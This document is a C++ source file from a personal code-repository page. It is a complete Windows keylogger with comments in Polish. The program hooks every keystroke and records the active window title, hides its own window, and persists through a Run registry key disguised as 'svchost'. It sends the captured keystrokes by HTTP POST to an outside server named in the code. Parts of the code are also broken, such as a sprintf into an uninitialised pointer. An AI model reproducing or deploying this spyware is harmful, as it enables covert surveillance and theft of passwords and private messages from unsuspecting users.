Foxbond's Repo

/** (c) 2012 Michał (Foxbond) Chraniuk */
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <iostream>
//#include <fstream>
#include <ctime>
#include <stdio.h>
#include <string>
#include <cstdio>
#include <unistd.h>


#include "curl/curl.h"

#include "base64/base64.h"
#include "base64/base64.cpp"

using namespace std;

HHOOK hKeyboardHook = 0;
string LogFile;
HWND hCurrentWindow;
char sWindowTitle[256];
char cReturn[] = {13, 10};
SYSTEMTIME SystemTime;
char cTime[64];
char cFileName[64];
unsigned short int error_count=0;
#define BUFSIZE 128
//#define cURL_SAVE_BUFFER 2048
unsigned int save_buffer_size = 2048;
int test_key(void);
void create_key(void);
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

/*  Make the class name into a global variable  */
char szClassName[ ] = "WindowsApp";

void save_log (void);

LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
	KBDLLHOOKSTRUCT *pKbdLLHookStruct = (KBDLLHOOKSTRUCT *)lParam;
	if (nCode >= 0)
	{
		if (wParam == WM_KEYUP)
		{
			if(hCurrentWindow != GetForegroundWindow())
			{
				hCurrentWindow = GetForegroundWindow();
				GetWindowText(hCurrentWindow, sWindowTitle, 256);
				GetSystemTime(&SystemTime);
				//byÂło sprintf_s
				sprintf(cTime, "[ Czas: %02d:%02d:%02d, ", SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond);
				LogFile += cReturn;
				LogFile += cTime;
				LogFile += " Nazwa okna: ";
				LogFile += sWindowTitle;
				LogFile += " ]";
				LogFile += cReturn;
			}



			switch(pKbdLLHookStruct->vkCode)
			{
				case VK_RETURN:
					LogFile += "[Enter]";
					LogFile += cReturn;

					break;
				case VK_BACK:
					LogFile += "[Backspace]";
					break;
				case VK_ESCAPE:
					LogFile += "[Escape]";
					break;
				case VK_CAPITAL:
					LogFile += "[Capslock]";
					break;
				case VK_LMENU:
					LogFile += "[LAlt]";
					break;
				case VK_RMENU:
					LogFile += "[RAlt]";
					break;
				case VK_MENU:
					LogFile += "[Alt]";
					break;
				case VK_CONTROL:
					LogFile += "[Ctrl]";
					break;
				case VK_DELETE:
					LogFile += "[Delete]";
					break;
				case VK_SPACE:
					LogFile += " ";
					break;
				case VK_MULTIPLY:
					LogFile += "*";
					break;
				case VK_ADD:
					LogFile += "+";
					break;
				case VK_SUBTRACT:
					LogFile += "-";
					break;
				case VK_DECIMAL:
					LogFile += ".";
					break;
				case VK_DIVIDE:
					LogFile += "/";
					break;
				case 188:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "<";
					else
						LogFile += ",";
					break;
				case 192:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "~~";
					else
						LogFile += "`";
					break;
				case 222:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "\"";
					else
						LogFile += "'";
					break;
				case 220:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "|";
					else
						LogFile += "\\";
					break;
				case 219:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "{";
					else
						LogFile += "[";
					break;
				case 221:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "}";
					else
						LogFile += "]";
					break;
				case 186:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += ":";
					else
						LogFile += ";";
					break;
				case 191:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "?";
					else
						LogFile += "/";
					break;
				case 190:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += ">";
					else
						LogFile += ".";
					break;
				case 44:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "<";
					else
						LogFile += ",";
					break;
				case 187:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "+";
					else
						LogFile += "=";
					break;
				case 189:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "_";
					else
						LogFile += "-";
					break;
				case 65:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "A";
					else
						LogFile += "a";
					break;
				case 66:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "B";
					else
						LogFile += "b";
					break;
				case 67:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "C";
					else
						LogFile += "c";
					break;
				case 68:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "D";
					else
						LogFile += "d";
					break;
				case 69:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "E";
					else
						LogFile += "e";
					break;
				case 70:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "F";
					else
						LogFile += "f";
					break;
				case 71:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "G";
					else
						LogFile += "g";
					break;
				case 72:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "H";
					else
						LogFile += "h";
					break;
				case 73:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "I";
					else
						LogFile += "i";
					break;
				case 74:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "J";
					else
						LogFile += "j";
					break;
				case 75:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "K";
					else
						LogFile += "k";
					break;
				case 76:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "L";
					else
						LogFile += "l";
					break;
				case 77:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "M";
					else
						LogFile += "m";
					break;
				case 78:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "N";
					else
						LogFile += "n";
					break;
				case 79:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "O";
					else
						LogFile += "o";
					break;
				case 80:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "P";
					else
						LogFile += "p";
					break;
				case 81:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "Q";
					else
						LogFile += "q";
					break;
				case 82:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "R";
					else
						LogFile += "r";
					break;
				case 83:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "S";
					else
						LogFile += "s";
					break;
				case 84:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "T";
					else
						LogFile += "t";
					break;
				case 85:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "U";
					else
						LogFile += "u";
					break;
				case 86:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "V";
					else
						LogFile += "v";
					break;
				case 87:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "W";
					else
						LogFile += "w";
					break;
				case 88:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "X";
					else
						LogFile += "x";
					break;
				case 89:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "Y";
					else
						LogFile += "y";
					break;
				case 90:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "Z";
					else
						LogFile += "z";
					break;
				case VK_NUMPAD0:
					LogFile += "0";
					break;
				case VK_NUMPAD1:
					LogFile += "1";
					break;
				case VK_NUMPAD2:
					LogFile += "2";
					break;
				case VK_NUMPAD3:
					LogFile += "3";
					break;
				case VK_NUMPAD4:
					LogFile += "4";
					break;
				case VK_NUMPAD5:
					LogFile += "5";
					break;
				case VK_NUMPAD6:
					LogFile += "6";
					break;
				case VK_NUMPAD7:
					LogFile += "7";
					break;
				case VK_NUMPAD8:
					LogFile += "8";
					break;
				case VK_NUMPAD9:
					LogFile += "9";
					break;
				case 48:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += ")";
					else
						LogFile += "0";
					break;
				case 49:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "!";
					else
						LogFile += "1";
					break;
				case 50:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "@";
					else
						LogFile += "2";
					break;
				case 51:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "#";
					else
						LogFile += "3";
					break;
				case 52:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "$";
					else
						LogFile += "4";
					break;
				case 53:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "%";
					else
						LogFile += "5";
					break;
				case 54:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "^";
					else
						LogFile += "6";
					break;
				case 55:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "&";
					else
						LogFile += "7";
					break;
				case 56:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "*";
					else
						LogFile += "8";
					break;
				case 57:
					if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
						LogFile += "(";
					else
						LogFile += "9";
					break;
			}//end case (chyba)

			if ( LogFile.size() > save_buffer_size )
			{
                 save_log(); //cURL save

            }

		}
	}

	return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
}



int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil) {
    HWND hwnd;               /* This is the handle for our window */
    MSG messages;            /* Here messages to the application are saved */
    WNDCLASSEX wincl;        /* Data structure for the windowclass */

    /* The Window structure */
    wincl.hInstance = hThisInstance;
    wincl.lpszClassName = szClassName;
    wincl.lpfnWndProc = WindowProcedure;      /* This function is called by windows */
    wincl.style = CS_DBLCLKS;                 /* Catch double-clicks */
    wincl.cbSize = sizeof (WNDCLASSEX);

    /* Use default icon and mouse-pointer */
    wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
    wincl.lpszMenuName = NULL;                 /* No menu */
    wincl.cbClsExtra = 0;                      /* No extra bytes after the window class */
    wincl.cbWndExtra = 0;                      /* structure or the window instance */
    /* Use Windows's default color as the background of the window */
    wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;

    /* Register the window class, and if it fails quit the program */
    if (!RegisterClassEx (&wincl)) {
        MessageBox(0, "Nie udało się zarejestrować klasy! Program kończy działanie...", 0, 0);
        return 0;
    }

    /* The class is registered, let's create the program*/
    hwnd = CreateWindowEx (
           0,                   /* Extended possibilites for variation */
           szClassName,         /* Classname */
           "SYSTEM",       /* Title Text */
           WS_OVERLAPPEDWINDOW, /* default window */
           CW_USEDEFAULT,       /* Windows decides the position */
           CW_USEDEFAULT,       /* where the window ends up on the screen */
           1,                 /* The programs width */
           1,                 /* and height in pixels */
           HWND_DESKTOP,        /* The window is a child-window to desktop */
           NULL,                /* No menu */
           hThisInstance,       /* Program Instance handler */
           NULL                 /* No Window Creation data */
           );

    /* Make the window visible on the screen */
    ShowWindow (hwnd, SW_HIDE);

    hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, GetModuleHandle(0), 0);
	if(hKeyboardHook == NULL)
		MessageBox(0, "Funkcja SetWindowsHookEx nie powiodła się.", 0, 0);


    unsigned short int create_reg_key =   1;//czy tworzyć klucz w rejestrze

	if ( test_key() == 2 && create_reg_key == 1 ) { create_key(); }


    /* Run the message loop. It will run until GetMessage() returns 0 */
    while (GetMessage (&messages, NULL, 0, 0))
    {
        /* Translate virtual-key messages into character messages */
        TranslateMessage(&messages);
        /* Send message to WindowProcedure */
        DispatchMessage(&messages);
    }


    if(UnhookWindowsHookEx(hKeyboardHook) == 0)
		MessageBox(0, "Funkcja UnhookWindowsHookEx nie powiodła się.", 0, 0);

	return EXIT_SUCCESS;
}


/*  This function is called by the Windows function DispatchMessage()  */

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)                  /* handle the messages */
    {
        case WM_DESTROY:
            PostQuitMessage (0);       /* send a WM_QUIT to the message queue */
            break;
        default:                      /* for messages that we don't deal with */
            return DefWindowProc (hwnd, message, wParam, lParam);
    }

    return 0;
}

// Write any errors in here
static char errorBuffer[CURL_ERROR_SIZE];

// Write all expected data in here
static string buffer;

// This is the writer call back function used by curl
static int writer(char *data, size_t size, size_t nmemb,
                  std::string *buffer)
{
  // What we will return
  int result = 0;

  // Is there anything in the buffer?
  if (buffer != NULL)
  {
    // Append the data to the buffer
    buffer->append(data, size * nmemb);

    // How much did we write?
    result = size * nmemb;
  }

  return result;
}

void save_log (void)
{
     //zapisywanie cURL
     CURL *curl;
     CURLcode result;
     //default: http://foxbond.cba.pl/bots/keylogger/revelation_log_handler.php
     //string url=reader.Get("cpp", "url", "aHR0cDovL2ZveGJvbmQuY2JhLnBsL2JvdHMva2V5bG9nZ2VyL3JldmVsYXRpb25fbG9nX2hhbmRsZXIucGhw");
     string url = "http://danarroth.com/klr/logHandler.php";
     char* method_post;
     //char *format = ;
     string version = "0.1"; //reader.Get("cpp", "version", "0");
     string id = "0"; //reader.Get("cpp", "id", "0");

     sprintf(method_post, "version=%d&id=%d&log=%d", version.c_str(), id.c_str(), LogFile.c_str() );

    curl = curl_easy_init();
    if (curl)
    {
      // Now set up all of the curl options

      curl_easy_setopt(curl, CURLOPT_ERRORBUFFER, errorBuffer);
      curl_easy_setopt(curl, CURLOPT_URL, url.c_str() );
      //curl_easy_setopt(curl, CURLOPT_HEADER, 0);
      //curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1);
      curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writer);
      curl_easy_setopt(curl, CURLOPT_WRITEDATA, &buffer);
      curl_easy_setopt(curl, CURLOPT_POST, 1);
      curl_easy_setopt(curl, CURLOPT_POSTFIELDS, method_post);

      // Attempt to retrieve the remote page
      result = curl_easy_perform(curl);

      // Always cleanup
      curl_easy_cleanup(curl);


      // Did we succeed?
      if (result == CURLE_OK)  {
        //ok
        string log_filename = "buffer.txt"; //////////////////////////////////nazwa pliku z buforem logu
        FILE *file;
        file=fopen(log_filename.c_str(),"a"); //dopisywanie
        fputs(LogFile.c_str(),file);
        fclose(file);
        LogFile.clear(); //kasowanie logu
      }
      else {
        //error
        error_count++;
        LogFile += "\n Save Error!!! \n";
        LogFile += errorBuffer;
        LogFile += "\n end error log \n";
      }

    }
    else {
        //curl object error
        error_count++;
        LogFile += "\n cURL init error!!! \n";
    }

    if (error_count >= 2) {
        string log_filename = "buffer.txt"; //////////////////////////////////nazwa pliku z buforem logu
        FILE *file;
        file=fopen(log_filename.c_str(),"a"); //dopisywanie
        fputs(LogFile.c_str(),file);
        fclose(file);
        LogFile.clear(); //kasowanie logu
        error_count = 0;
        LogFile += "\n Second error. Log saved to file, buffer cleared! \n";
      }


}

int test_key(void)
{
	int check;
	HKEY hKey;
	char path[BUFSIZE];
	DWORD buf_length=BUFSIZE;
	int reg_key;

	unsigned short int regtype =  9;
	
		if (regtype == 0)
		{
            reg_key=RegOpenKeyEx(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
        }
        else if (regtype != 9)
        {
            reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
        }


	if(reg_key!=0)
	{
		check=1;
		return check;
	}

	reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

	if((reg_key!=0)||(buf_length>BUFSIZE))
		check=2;
	if(reg_key==0)
		check=0;

	RegCloseKey(hKey);

	return check;
}

void create_key(void)
{
		int reg_key;
		HKEY hkey;

		string key_path =  "%windir%\\svchost.exe";//reader.Get("cpp", "path", "%windir%\\svchost.exe");


		char *path = (char*)key_path.c_str();

		unsigned short int regtype =  9; //wyżej jest to samo
		if (regtype == 0)
		{
            reg_key=RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        }
        else if (regtype != 9)
        {
            reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        }
        
        if(reg_key==0)
		{
				RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
		}

}

> Back

foxbond@o2.pl | Running on Foxbond µFramework